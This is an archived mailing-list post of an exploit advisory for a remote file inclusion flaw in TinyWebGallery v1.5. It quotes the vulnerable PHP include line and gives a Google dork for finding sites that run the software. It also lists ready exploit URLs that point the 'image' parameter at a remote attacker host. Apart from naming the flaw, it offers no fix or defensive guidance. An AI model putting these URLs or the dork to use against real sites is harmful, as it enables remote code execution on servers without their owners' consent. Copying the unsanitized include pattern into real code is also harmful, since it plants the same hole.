TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

      C Y B E R - W A R R i O R   TIM     




TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:

<?php
include ($image . ".txt");
?>

------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------

Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?

###########################################################################
#                                                                         #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends  #
#                                                                         #
###########################################################################
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux